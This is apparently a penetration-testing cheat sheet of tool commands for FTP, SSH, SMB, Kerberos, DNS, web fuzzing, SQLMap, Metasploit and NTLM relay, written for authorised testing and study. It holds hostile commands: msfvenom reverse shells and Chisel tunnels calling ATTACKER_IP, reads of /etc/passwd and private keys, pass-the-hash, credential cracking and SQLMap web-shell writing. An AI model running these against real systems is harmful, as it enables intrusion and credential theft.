Some FTP servers allow directory traversal outside the FTP root

RETR ../../../home/<USER>/.ssh/id_rsa
RETR ../../../../etc/passwd

Brute Force

hydra -L users.txt -P passwords.txt ftp://<TARGET> -t 4

Config Files (if you have system access)

cat /etc/vsftpd.conf | grep -v "#"
cat /etc/ftpusers

Dangerous Setting	Description
`anonymous_enable=YES`	Anonymous login allowed
`anon_upload_enable=YES`	Anonymous can upload
`write_enable=YES`	FTP write commands allowed

RPCClient

rpcclient — Samba tool for interacting with Windows RPC endpoints for user and domain enumeration.

Connect

Null session

rpcclient -U '' -N <TARGET>

With credentials

rpcclient -U '<DOMAIN>/<USER>%<PASS>' <TARGET>

Enumeration Commands

Command	Description
`srvinfo`	Server OS and version info
`enumdomusers`	Enumerate domain users
`enumdomgroups`	Enumerate domain groups
`querygroup <RID>`	Get group details by RID
`queryuser <RID>`	Get user details by RID
`querydispinfo`	List users with description fields
`enumprinters`	Enumerate printers
`netshareenumall`	Enumerate all shares

Password Change (setuserinfo2)

Force a password change for a user (requires write rights to the account)

setuserinfo2 <USERNAME> 23 '<NEWPASSWORD>'

Brute Force RIDs

for i in $(seq 500 1100); do rpcclient -N -U '' <TARGET> -c "queryuser $i" 2>/dev/null | grep "User Name"; done

(22) SSH

SSH enumeration, credential testing, key cracking, tunneling, and lateral movement.

Enumeration

sudo nmap -sV -p22 --script ssh2-enum-algos,ssh-hostkey <TARGET>
nc <TARGET> 22

Connect

Password

ssh <USER>@<TARGET>

Private key

chmod 600 id_rsa
ssh -i id_rsa <USER>@<TARGET>

Force password auth (ignore key auth)

ssh -o PreferredAuthentications=password <USER>@<TARGET>

Crack an Encrypted Private Key

ssh2john id_rsa > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Username Enumeration (OpenSSH < 7.7)

python ssh_user_enum.py --port 22 --userList users.txt <TARGET>

Brute Force

hydra -L users.txt -P passwords.txt ssh://<TARGET>

Tunneling (Once Authenticated)

Local port forward — reach an internal service from your machine

ssh -L <LOCAL_PORT>:<INTERNAL_HOST>:<INTERNAL_PORT> <USER>@<TARGET>

Dynamic SOCKS proxy

ssh -D 9050 <USER>@<TARGET>
# Then: proxychains nmap -sT <INTERNAL_CIDR>

Lateral Movement

Check for reusable keys and known_hosts after initial access

ls -la ~/.ssh/
cat ~/.ssh/id_rsa
cat ~/.ssh/known_hosts
cat ~/.ssh/authorized_keys

Config Files

cat /etc/ssh/sshd_config | grep -v "#" | sed -r '/^\s*$/d'

Dangerous Setting	Description
`PermitRootLogin yes`	Root can log in directly
`PasswordAuthentication yes`	Passwords accepted
`PermitEmptyPasswords yes`	Empty password allowed

rpcinfo

rpcinfo — list RPC programs registered on a remote host, commonly used to identify NFS and other RPC services.

Usage

List all RPC services on a remote host

rpcinfo -p <TARGET>

Check if a specific program is registered

rpcinfo -t <TARGET> <PROGRAM_NUMBER>

Common Program Numbers

Program	Number	Service
portmapper	100000	RPCbind
nfs	100003	NFS
mountd	100005	NFS mount daemon
nlockmgr	100021	NFS lock manager
status	100024	NSM status

Rubeus

Rubeus — C# Kerberos abuse toolkit for roasting, ticket requests, pass-the-ticket, and delegation attacks.

Kerberoasting

.\Rubeus.exe kerberoast /nowrap

Target a specific user

.\Rubeus.exe kerberoast /user:<USER> /nowrap

AS-REPRoasting

.\Rubeus.exe asreproast /nowrap

Request TGT

.\Rubeus.exe asktgt /user:<USER> /password:<PASS> /domain:<DOMAIN> /nowrap

With NTLM hash (overpass-the-hash)

.\Rubeus.exe asktgt /user:<USER> /rc4:<NTLM_HASH> /domain:<DOMAIN> /nowrap

Pass the Ticket

Import a .kirbi ticket into the current session

.\Rubeus.exe ptt /ticket:<BASE64_OR_PATH>

Dump Tickets

Dump all tickets in the current session

.\Rubeus.exe triage
.\Rubeus.exe dump /nowrap

Dump tickets for a specific LUID

.\Rubeus.exe dump /luid:<LUID> /nowrap

S4U (Constrained Delegation)

Request a service ticket impersonating another user

.\Rubeus.exe s4u /user:<SERVICE_ACCT> /rc4:<HASH> /impersonateuser:<TARGET_USER> /msdsspn:<SPN> /nowrap

Crack Captured Hashes

hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asreproast.txt /usr/share/wordlists/rockyou.txt

RustHound

RustHound-CE — Rust-based BloodHound data collector for Active Directory enumeration.

Collect All Data

rusthound-ce -d <DOMAIN> -u '<USER>@<DOMAIN>' -p '<PASS>' -o ./bh -z

DC-Only Collection (faster, less noise)

rusthound-ce -u '<USER>' -p '<PASS>' -c DCOnly -i <DC_IP> --domain <DOMAIN> --zip

Output

Results are written to ./bh/ as JSON files (or a zip with --zip). Import the zip directly into BloodHound.

(25) SMTP

SMTP user enumeration, open relay testing, and mailbox access via IMAP/POP3.

Enumeration

sudo nmap -sV -p25,465,587 --script smtp-* <TARGET>
nc <TARGET> 25

User Enumeration

VRFY method

smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t <TARGET>

RCPT method (most reliable)

smtp-user-enum -M RCPT -U users.txt -t <TARGET> -D <DOMAIN>

Manual VRFY

telnet <TARGET> 25
VRFY root
VRFY admin

Open Relay Check

nmap -p25 --script smtp-open-relay <TARGET>

Manual test

telnet <TARGET> 25
EHLO attacker.com
MAIL FROM:<attacker@external.com>
RCPT TO:<victim@target.com>
DATA
Subject: Test
Test body
.

IMAP Mailbox Access (Port 143)

nc <TARGET> 143
a1 LOGIN <USER> <PASS>
a2 LIST "" "*"
a3 SELECT INBOX
a4 FETCH 1 BODY[]

POP3 Mailbox Access (Port 110)

nc <TARGET> 110
USER <USER>
PASS <PASS>
LIST
RETR 1

SharpHound

SharpHound — C# BloodHound data collector for Active Directory enumeration from a domain-joined Windows host.

Collect All Data

.\SharpHound.exe -c All --zipfilename bh_out

Common Collection Methods

Flag	Description
`-c All`	Collect everything (default for engagements)
`-c DCOnly`	DC data only — faster, less network noise
`-c Session`	Active session data only
`--stealth`	Reduce noise by skipping session enumeration

Specify Domain Controller

.\SharpHound.exe -c All --domaincontroller <DC_FQDN> --zipfilename bh_out

Output

Produces a zip file. Copy to attacker machine and import into BloodHound.

# Copy out via SMB share or base64
[Convert]::ToBase64String([IO.File]::ReadAllBytes("bh_out.zip"))

SharpView

SharpView — C# port of PowerView for AD enumeration from Windows without PowerShell.

Usage

SharpView mirrors the PowerView API. Append help to any command to see parameters.

.\SharpView.exe Get-DomainUser help

Common Commands

Enumerate all domain users

.\SharpView.exe Get-DomainUser

Enumerate a specific user

.\SharpView.exe Get-DomainUser -Identity <USER>

Enumerate domain groups

.\SharpView.exe Get-DomainGroup

Enumerate group members

.\SharpView.exe Get-DomainGroupMember -Identity '<GROUP>'

Find ACLs with non-default write rights

.\SharpView.exe Find-InterestingDomainAcl

Test local admin access across the domain

.\SharpView.exe Find-LocalAdminAccess

Enumerate domain trusts

.\SharpView.exe Get-DomainTrust

Snaffler

Snaffler — automated share and file hunting tool for finding credentials and sensitive data in AD environments.

Usage

Run against the current domain

.\Snaffler.exe -s -d <DOMAIN> -o snaffler.log -v data

Key Flags

Flag	Description
`-s`	Print results to screen
`-d <domain>`	Domain to search
`-o <file>`	Write output to file
`-v data`	Verbosity — show file content matches
`-v info`	Show info-level messages

tcpdump

tcpdump — command-line packet capture for live traffic analysis and credential interception.

Basic Capture

Capture on a specific interface

sudo tcpdump -i tun0

Capture and write to a pcap file

sudo tcpdump -i tun0 -w capture.pcap

Read a pcap file

tcpdump -r capture.pcap

Common Filters

Capture only TCP traffic

sudo tcpdump -i tun0 tcp

Capture traffic to/from a specific host

sudo tcpdump -i tun0 host <TARGET>

Capture on a specific port

sudo tcpdump -i tun0 port 445

Capture HTTP traffic

sudo tcpdump -i tun0 port 80 or port 443

Exclude noisy protocols

sudo tcpdump -i tun0 not arp and not icmp

Show packet contents in ASCII

sudo tcpdump -i tun0 -A port 80

Key Flags

Flag	Description
`-i <iface>`	Interface to capture on
`-w <file>`	Write to pcap file
`-r <file>`	Read from pcap file
`-n`	No DNS resolution
`-A`	Print packet contents as ASCII
`-X`	Print packet contents as hex and ASCII
`-v` / `-vv`	Verbose output
`port <n>`	Filter by port
`host <IP>`	Filter by host

TruffleHog

TruffleHog — secret scanning tool for git repositories, filesystems, and cloud storage.

Git Repository

Scan a local git repo

trufflehog git file://. --only-verified

Scan a remote git repo

trufflehog git <REPO_URL> --only-verified

Filesystem

Scan a directory

trufflehog filesystem <PATH>

S3 Bucket

trufflehog s3 --bucket <BUCKET_NAME>

Key Flags

Flag	Description
`--only-verified`	Only report secrets that verified as active
`--no-update`	Skip update check
`--json`	Output as JSON
`--concurrency <n>`	Number of concurrent workers

Wireshark

Wireshark — GUI packet analyzer with display filters for protocol inspection and credential hunting.

Open a Capture

wireshark capture.pcap

Common Display Filters

Filter	Description
`tcp`	All TCP traffic
`udp`	All UDP traffic
`ip.addr == <IP>`	Traffic to or from an IP
`ip.src == <IP>`	Traffic from an IP
`ip.dst == <IP>`	Traffic to an IP
`tcp.port == 445`	SMB traffic
`tcp.port == 80 or tcp.port == 443`	HTTP/HTTPS
`http`	HTTP protocol layer
`http.request`	HTTP requests only
`http contains "password"`	HTTP containing string
`ftp`	FTP traffic
`ftp-data`	FTP data transfers
`telnet`	Telnet traffic
`smtp`	SMTP email traffic
`dns`	DNS queries and responses
`kerberos`	Kerberos authentication
`ntlmssp`	NTLM authentication
`nbns`	NetBIOS name service (LLMNR/NBT-NS)

Follow TCP Stream

Right-click a packet → Follow → TCP Stream to read the full session conversation as plaintext where applicable.

xFreeRDP

xFreeRDP — command-line RDP client supporting pass-the-hash, drive mapping, and resolution control.

Connect

Standard connection

xfreerdp /v:<TARGET> /u:<USER> /p:'<PASS>'

Pass-the-Hash (no plaintext password required)

xfreerdp /v:<TARGET> /u:<USER> /pth:<NTLM_HASH>

Connect with domain

xfreerdp /v:<TARGET> /d:<DOMAIN> /u:<USER> /p:'<PASS>'

Common Options

Set resolution

xfreerdp /v:<TARGET> /u:<USER> /p:'<PASS>' /size:1920x1080

Map a local drive into the RDP session

xfreerdp /v:<TARGET> /u:<USER> /p:'<PASS>' /drive:<SHARE_NAME>,<LOCAL_PATH>

Skip certificate warning

xfreerdp /v:<TARGET> /u:<USER> /p:'<PASS>' /cert:ignore

Enable clipboard sharing

xfreerdp /v:<TARGET> /u:<USER> /p:'<PASS>' +clipboard

Key Flags

Flag	Description
`/v:<target>`	Target host (IP or FQDN)
`/u:<user>`	Username
`/p:<pass>`	Password
`/pth:<hash>`	Pass-the-Hash (NTLM)
`/d:<domain>`	Domain
`/size:<WxH>`	Resolution
`/drive:<name>,<path>`	Map local path as a drive
`/cert:ignore`	Ignore certificate errors
`+clipboard`	Enable clipboard sharing
`/dynamic-resolution`	Allow window resize to change resolution

AutoRecon

AutoRecon — automated multi-threaded enumeration tool that runs nmap and service-specific scanners in one pass.

Usage

Single target — creates a results directory

sudo autorecon <TARGET>

Multiple targets

sudo autorecon <TARGET1> <TARGET2>

Limit to scan output only (no service-specific tools)

sudo autorecon <TARGET> --only-scans-dir

Chisel / Proxychains

Chisel — TCP/UDP tunnel over HTTP for pivoting; Proxychains — route tool traffic through a SOCKS proxy.

Reverse Tunnel Setup

On attacker box — start the server

./chisel server --reverse

On target — connect back and expose a SOCKS proxy

.\chisel.exe client <ATTACKER_IP>:8080 R:socks

Confirm the SOCKS listener is up (port 1080)

netstat -lnpt | grep 1080

Configure Proxychains

Edit /etc/proxychains.conf to add the SOCKS5 proxy:

socks5 127.0.0.1 1080

Route traffic through the tunnel

proxychains4 -q nxc smb <INTERNAL_TARGET> -u <USER> -p '<PASS>' --shares

-q suppresses Proxychains output from the console.

Regular Tunnel (Target as Server)

On target

.\chisel.exe server --socks5

On attacker box

sudo chisel client <TARGET_IP>:8080 socks

Kill Chisel (Windows)

Stop-Process -Name chisel -Force

Dig

dig — DNS lookup utility for querying NS records, zone transfers, and version enumeration.

Common Queries

NS record lookup

dig ns <DOMAIN> @<DNS_SERVER>

ANY record lookup

dig any <DOMAIN> @<DNS_SERVER>

DNS server version

dig CH TXT version.bind <DNS_SERVER>

Zone Transfer

External zone

dig axfr <DOMAIN> @<DNS_SERVER>

Internal zone

dig axfr <INTERNAL_DOMAIN> @<DNS_SERVER>

DNSEnum

DNSEnum — DNS enumeration tool for subdomain brute-forcing and zone transfer attempts.

Subdomain Brute Force

dnsenum --dnsserver <DNS_SERVER> --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt <DOMAIN>

Key Flags

Flag	Description
`--dnsserver <ip>`	Target DNS server
`--enum`	Enable full enumeration
`-p 0`	Disable Google scraping
`-s 0`	Disable wildcard domain scraping
`-o <file>`	Output to file
`-f <wordlist>`	Subdomain wordlist

Evil-WinRM

Evil-WinRM — PowerShell remoting shell for Windows targets over WinRM, supporting pass-the-hash and SSL.

Connect

Password

evil-winrm -i <TARGET> -u <USER> -p '<PASS>'

Pass-the-Hash

evil-winrm -i <TARGET> -u <USER> -H <NTLM_HASH>

With SSL

evil-winrm -i <TARGET> -u <USER> -p '<PASS>' -S

With domain

evil-winrm -i <TARGET> -u <DOMAIN>\\<USER> -p '<PASS>'

File Transfer

Upload a file to the target

upload <LOCAL_FILE> <REMOTE_PATH>

Download a file from the target

download <REMOTE_PATH> <LOCAL_FILE>

Load PowerShell Scripts

evil-winrm -i <TARGET> -u <USER> -p '<PASS>' -s /path/to/scripts/

Then from the shell:

PowerView.ps1
Get-Domain

ExploitDB / Searchsploit

Searchsploit — CLI interface to the Exploit-DB offline database for finding public exploits by service and version.

Search

Search by service and version

searchsploit openssh 7.2

Search for OS or kernel exploits

searchsploit linux kernel 5.4
searchsploit windows 10

Search by CVE

searchsploit cve-2021-44228

Examine an Exploit

Copy exploit to current directory

searchsploit -m <ID>

View exploit path on disk

searchsploit -p <ID>

Update Database

searchsploit -U

FeroxBuster

FeroxBuster — recursive content discovery tool for web directories and files.

Directory Fuzzing

feroxbuster -u http://<TARGET> -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50

With extension fuzzing

feroxbuster -u http://<TARGET> -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt -t 50

Recursive with depth limit

feroxbuster -u http://<TARGET> -w /usr/share/seclists/Discovery/Web-Content/common.txt -d 2 -t 50

Filtering

Filter by response size

feroxbuster -u http://<TARGET> -w <WORDLIST> -S <SIZE>

Filter by status code

feroxbuster -u http://<TARGET> -w <WORDLIST> -C 404,403

Filter by word count

feroxbuster -u http://<TARGET> -w <WORDLIST> -W <WORDCOUNT>

Key Flags

Flag	Description
`-u`	Target URL
`-w`	Wordlist
`-t`	Threads
`-d`	Recursion depth
`-x`	File extensions to append
`-S`	Filter by response size
`-C`	Filter by status code (deny list)
`-W`	Filter by word count
`-s`	Only show these status codes (allow list)
`--dont-scan`	Exclude a URL from scanning

FFUF

FFUF — fast web fuzzer for directory, file, subdomain, vhost, and parameter discovery.

Directory Fuzzing

ffuf -u http://<TARGET>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -ic -t 200

File and Extension Fuzzing

Fuzz extensions on a known path

ffuf -u http://<TARGET>/indexFUZZ -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt

Fuzz multiple extensions at once

ffuf -u http://<TARGET>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -e .php,.html,.txt,.bak

Recursive Fuzzing

ffuf -u http://<TARGET>/FUZZ -w <WORDLIST> -recursion -recursion-depth 2 -e .php,.html -v

Subdomain Fuzzing

ffuf -u https://FUZZ.<DOMAIN>/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

VHost Fuzzing

ffuf -u http://<TARGET>/ -H 'Host: FUZZ.<DOMAIN>' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -ac

-ac auto-calibrates filtering to remove false positives.

Parameter Fuzzing

GET parameter name

ffuf -u http://<TARGET>/page.php?FUZZ=key -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fs <SIZE>

POST parameter name

ffuf -u http://<TARGET>/page.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fs <SIZE>

Value Fuzzing

Generate a numeric ID wordlist then fuzz

for i in $(seq 1 1000); do echo $i >> ids.txt; done
ffuf -u http://<TARGET>/page.php?id=FUZZ -w ids.txt -fs <SIZE>

Key Flags

Flag	Description
`-u`	Target URL (place `FUZZ` where to fuzz)
`-w`	Wordlist (supports `WORDLIST:KEYWORD` format)
`-ic`	Ignore wordlist comments
`-t`	Threads (default 40)
`-e`	File extensions to append
`-X`	HTTP method
`-d`	POST data
`-H`	Add header
`-fs`	Filter by response size
`-fc`	Filter by status code
`-fw`	Filter by word count
`-fl`	Filter by line count
`-mc`	Match status codes
`-ac`	Auto-calibrate filters
`-v`	Verbose (show full URLs)
`-o`	Output file

FinalRecon

FinalRecon — automated OSINT and web reconnaissance tool covering headers, SSL, DNS, WHOIS, and crawling.

Usage

Full automated recon against a target

finalrecon --url http://<TARGET>

Install

sudo apt install finalrecon

GoBuster

GoBuster — directory, file, DNS, and vhost brute-forcing tool written in Go.

Directory / File Fuzzing

gobuster dir -u http://<TARGET> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobust_out.txt

With extensions

gobuster dir -u http://<TARGET> -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt -o gobust_out.txt

DNS Subdomain Brute Force

gobuster dns -d <DOMAIN> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

VHost Fuzzing

gobuster vhost -u http://<TARGET> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

Key Flags

Flag	Description
`dir`	Directory / file mode
`dns`	DNS subdomain mode
`vhost`	Virtual host mode
`-u`	Target URL
`-d`	Target domain (dns mode)
`-w`	Wordlist
`-x`	File extensions
`-t`	Threads
`-o`	Output file
`-q`	Quiet mode
`-k`	Skip TLS verification

Masscan

Masscan — extremely fast port scanner capable of scanning the entire internet at high packet rates.

Usage

Full port scan of a single target

sudo masscan -p1-65535 <TARGET> --rate=1000 -oL masscan_output.txt

Scan specific ports across a subnet

sudo masscan -p80,443,445 <CIDR> --rate=1000

Key Flags

Flag	Description
`-p`	Port range or specific ports
`--rate`	Packets per second
`-oL <file>`	Output in list format
`-oJ <file>`	Output as JSON
`--open`	Show only open ports

Metasploit

Metasploit Framework — exploit development and delivery platform with auxiliary modules, payloads, and post-exploitation.

Basic Workflow

Start the console

msfconsole -q

Search for exploits

search type:exploit name:apache
search apache 2.4.49
search type:exploit platform:windows smb
search cve:2021

Use an exploit and configure it

use <MODULE_PATH_OR_NUMBER>
options
set RHOSTS <TARGET>
set LHOST <ATTACKER_IP>
exploit

use auxiliary/scanner/smb/smb_login
set RHOSTS <TARGET>
set USER_FILE users.txt
set PASS_FILE passwords.txt
set THREADS 10
run

Meterpreter

Drop from meterpreter to shell

shell

Background a session

background
sessions -l
sessions -i <ID>

MSFVenom — Generate Payloads

Linux reverse shell (stageless ELF)

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f elf -o shell.elf

Windows reverse shell (EXE)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f exe -o shell.exe

PHP reverse shell

msfvenom -p php/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f raw -o shell.php

ASPX reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f aspx -o shell.aspx

JSP WAR file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f war -o shell.war

List all payloads

msfvenom -l payloads

Nessus

Nessus — GUI vulnerability scanner; access via browser at https://localhost:8834 after starting the service.

Service Management

Start

sudo systemctl start nessusd.service

Stop

sudo systemctl stop nessusd.service

Enable at boot

sudo systemctl enable nessusd.service

Access

Navigate to https://localhost:8834 in a browser.

Workflow

Create a new scan
Select a template — Basic Network Scan, Web Application Tests, etc.
Set target IP or range
Launch scan
Review results by severity: Critical → High → Medium → Low

Nikto

Nikto — web server scanner that checks for dangerous files, outdated software, and misconfigurations.

Usage

Scan HTTP target

nikto -h http://<TARGET>

Scan HTTPS target

nikto -h https://<TARGET>

Scan a non-standard port

nikto -h <TARGET> -p <PORT>

Output to file

nikto -h http://<TARGET> -o nikto_out.txt -Format txt

Key Flags

Flag	Description
`-h`	Target host or URL
`-p`	Port
`-ssl`	Force SSL
`-o <file>`	Output file
`-Format`	Output format: txt, html, csv, xml
`-Tuning`	Test tuning (1-9, x)
`-useproxy`	Route through proxy

NTLMRelayx

NTLMRelayx — Impacket tool for relaying NTLM authentication to SMB, LDAP, MSSQL, and other targets.

Setup

Generate a relay target list — hosts with SMB signing disabled

nxc smb <CIDR> --gen-relay-list relay.txt

SMB Relay — Dump SAM

Relay captured NTLM hashes to targets with signing disabled; auto-dumps SAM on success

ntlmrelayx.py -tf relay.txt -smb2support --no-http

Interactive Shell

Drop into an interactive SMB shell on relay success

ntlmrelayx.py -tf relay.txt -smb2support -i

LDAP Relay — Dump Domain Info

ntlmrelayx.py -tf relay.txt -smb2support --no-http -t ldap://<DC_IP>

Trigger with Drop-SC Module

Plant a .searchConnector-ms file on a writable share to coerce authentication

nxc smb <TARGET> -u <USER> -p '<PASS>' -M drop-sc -o URL=\\\\<ATTACKER_IP>\\secret SHARE=<SHARE> FILENAME=secret

OpenVAS / GVM

OpenVAS (GVM) — open-source vulnerability scanner; access via browser after running gvm-start.

Service Management

Start

gvm-start

Stop

gvm-stop

Verify setup

gvm-check-setup

Access

Navigate to https://127.0.0.1:9392 in a browser.

Workflow

Create a new Target with the IP or range
Create a new Task and assign the target and scan config
Launch the task
Review results and export reports

Common scan configs: Full and fast, Discovery, System Discovery

OWASP ZAP

OWASP ZAP — web application security scanner with active/passive scanning, proxy interception, and fuzzing.

Launch

GUI mode

zaproxy

CLI quick scan with HTML report

zaproxy -quickurl http://<TARGET> -quickout report.html

Daemon mode (headless)

zaproxy -daemon

GUI Workflow

Open ZAP browser or configure browser proxy to 127.0.0.1:8080
Browse to target — ZAP passively maps the site
Right-click site in Sites tree → Attack → Active Scan
Review Alerts tab for findings

RustScan

RustScan — fast port scanner that hands off results to nmap for service detection.

Usage

Fast scan all ports then pass to nmap for service/script detection

rustscan -a <TARGET> -- -sV -sC

Scan specific ports

rustscan -a <TARGET> -p 22,80,443,445

Scan a CIDR range

rustscan -a <CIDR> -- -sV

Key Flags

Flag	Description
`-a`	Target address, CIDR, or file
`-p`	Specific ports
`-b`	Batch size (default 4500)
`-t`	Timeout in ms
`--`	Pass remaining args to nmap

SMBClient

smbclient — command-line SMB client for listing shares and transferring files.

Connect

List shares (null session)

smbclient -L //<TARGET> -N

List shares with credentials

smbclient -L //<TARGET> -U '<USER>%<PASS>'

Connect to a share

smbclient //<TARGET>/<SHARE> -U '<USER>%<PASS>'

Interactive Commands

Command	Description
`ls`	List files
`get <file>`	Download a file
`put <file>`	Upload a file
`mget *`	Download all files
`recurse on`	Enable recursive mode
`prompt off`	Disable transfer prompts
`cd <dir>`	Change directory
`exit`	Disconnect

Recursive Download

smbclient //<TARGET>/<SHARE> -U '<USER>%<PASS>' -c 'recurse;prompt off;mget *'

SQLMap

SQLMap — automated SQL injection detection and exploitation tool.

Basic Usage

GET request

sqlmap -u "http://<TARGET>/page.php?id=1" --batch

POST request

sqlmap -u "http://<TARGET>/login.php" --data 'uid=1&name=test' --batch

From a saved Burp request file

sqlmap -r req.txt --batch

Enumeration

Database banner, current user, current DB, DBA check

sqlmap -u "http://<TARGET>/page.php?id=1" --banner --current-user --current-db --is-dba

List tables in a database

sqlmap -u "http://<TARGET>/page.php?id=1" --tables -D <DB_NAME>

Dump a table

sqlmap -u "http://<TARGET>/page.php?id=1" --dump -T <TABLE> -D <DB_NAME>

Dump selected columns

sqlmap -u "http://<TARGET>/page.php?id=1" --dump -T <TABLE> -D <DB_NAME> -C username,password

Search for tables or columns

sqlmap -u "http://<TARGET>/page.php?id=1" --search -T user
sqlmap -u "http://<TARGET>/page.php?id=1" --search -C pass

OS Exploitation

Check file read/write privileges

sqlmap -u "http://<TARGET>/page.php?id=1" --is-dba
sqlmap -u "http://<TARGET>/page.php?id=1" --file-read "/etc/passwd"

Write a web shell

sqlmap -u "http://<TARGET>/page.php?id=1" --file-write shell.php --file-dest "/var/www/html/shell.php"

Get an interactive OS shell

sqlmap -u "http://<TARGET>/page.php?id=1" --os-shell

WAF Bypass

Randomize user-agent

sqlmap -u "<URL>" --random-agent

Use tamper scripts

sqlmap -u "<URL>" --tamper=between,randomcase

Skip WAF detection

sqlmap -u "<URL>" --skip-waf

Key Flags

Flag	Description
`-u`	Target URL
`--data`	POST data
`-r`	Load request from file
`--batch`	Skip all prompts (use defaults)
`-p`	Specify parameter to test
`--level`	Test depth 1–5
`--risk`	Risk level 1–3
`--random-agent`	Randomize user-agent
`--tamper`	Tamper scripts (comma-separated)
`--proxy`	Route through proxy
`--cookie`	Add session cookie
`--csrf-token`	Handle CSRF token
`-v`	Verbosity 0–6

wafw00f

wafw00f — WAF detection tool that fingerprints web application firewalls by analysing HTTP responses.

Usage

Detect WAF on a target

wafw00f http://<TARGET>

Test all WAF signatures

wafw00f http://<TARGET> -a

(53) DNS

DNS zone transfer, record enumeration, subdomain brute force, and cache snooping.

Enumeration

sudo nmap -sU -sV -p53 --script dns-* <TARGET>

Zone Transfer (AXFR)

dig axfr <DOMAIN> @<DNS_SERVER>
host -l <DOMAIN> <DNS_SERVER>

Internal zone

dig axfr <INTERNAL_DOMAIN> @<DNS_SERVER>

Record Enumeration

dig @<DNS_SERVER> <DOMAIN> ANY
dig @<DNS_SERVER> <DOMAIN> A
dig @<DNS_SERVER> <DOMAIN> MX
dig @<DNS_SERVER> <DOMAIN> NS
dig @<DNS_SERVER> <DOMAIN> TXT
dig -x <IP> @<DNS_SERVER>

DNS server version

dig CH TXT version.bind <DNS_SERVER>

Subdomain Brute Force

dnsenum --dnsserver <DNS_SERVER> --enum -p 0 -s 0 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt <DOMAIN>

Manual loop

for sub in $(cat /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt); do
  dig $sub.<DOMAIN> @<DNS_SERVER> | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub
done

Cache Snooping

Check if a domain is cached (recently resolved) without recursion

dig @<DNS_SERVER> <DOMAIN> A +norecurse

Dangerous Setting	Description
`allow-transfer`	Permits zone transfers from any host
`allow-recursion`	Open recursion — enables cache snooping
`allow-query`	Unrestricted DNS queries

John the Ripper

John the Ripper — CPU-based password cracking, format converters, and wordlist attacks.

Basic Wordlist Attack

john --wordlist=/usr/share/wordlists/rockyou.txt <HASH_FILE>

Show cracked passwords

john --show <HASH_FILE>

Specify Hash Format

John auto-detects formats but explicit is safer

john --format=<FORMAT> --wordlist=/usr/share/wordlists/rockyou.txt <HASH_FILE>

List all supported formats

john --list=formats

Common Formats

Format Flag	Hash Type
`NT`	NTLM (Windows)
`sha512crypt`	SHA-512 Unix ( $6$ )
`md5crypt`	MD5 Unix ( $1$ )
`bcrypt`	bcrypt ( $2a$ , $2b$ )
`krb5tgs`	Kerberoast TGS-REP
`krb5asrep`	AS-REP Roast
`ssh`	SSH private key passphrase
`zip`	ZIP archive password
`rar`	RAR archive password
`keepass`	KeePass master password
`pdf`	PDF password
`7z`	7-Zip archive password
`office`	Microsoft Office password

Format Converters (2john)

Convert a file into a john-crackable hash before running the attack.

Converter	Source	Output
`ssh2john id_rsa`	SSH private key	passphrase hash
`zip2john archive.zip`	ZIP file	archive password hash
`rar2john archive.rar`	RAR file	archive password hash
`7z2john archive.7z`	7-Zip file	archive password hash
`pdf2john file.pdf`	PDF document	owner/user password hash
`keepass2john db.kdbx`	KeePass database	master password hash
`office2john doc.docx`	Office document	open password hash
`gpg2john key.gpg`	GPG private key	passphrase hash
`pfx2john cert.pfx`	PFX certificate	import password hash
`bitlocker2john image.img`	BitLocker volume	recovery key hash

General workflow

<converter> <FILE> > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt

Rule-Based Attack

john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 <HASH_FILE>

Incremental (Brute Force)

john --incremental <HASH_FILE>

Resume a Cracking Session

john --restore

Useful Flags

Flag	Description
`--wordlist=`	Specify wordlist path
`--format=`	Specify hash format explicitly
`--rules=`	Apply mangling rules
`--show`	Display cracked passwords
`--restore`	Resume interrupted session
`--session=<NAME>`	Name a session for later restore
`--fork=<N>`	Use N CPU cores

(139) NetBIOS

NetBIOS name resolution, share enumeration, and session enumeration.

Enumeration

Nmap scan

sudo nmap -sV -p137,138,139 --script nbstat,nbtstat <TARGET>

Name lookup

nmblookup -A <TARGET>

Name Table

Code	Type	Description
`<00>`	UNIQUE	Workstation service (hostname)
`<03>`	UNIQUE	Messenger service
`<06>`	UNIQUE	RAS Server service
`<1F>`	UNIQUE	NetDDE service
`<20>`	UNIQUE	File Server service (SMB)
`<1D>`	GROUP	Master Browser
`<1B>`	UNIQUE	Domain Master Browser

nbtscan <TARGET>
nbtscan -r <CIDR>

NetBIOS session list (Windows — requires authenticated access)

nbtstat -S <TARGET>

Null Session (Legacy — Windows XP/2003)

net use \\<TARGET>\IPC$ "" /u:""

After null session, enumerate via rpcclient

rpcclient -U "" -N <TARGET>

Notes

NetBIOS on port 139 is the older transport; SMB now runs directly over TCP 445
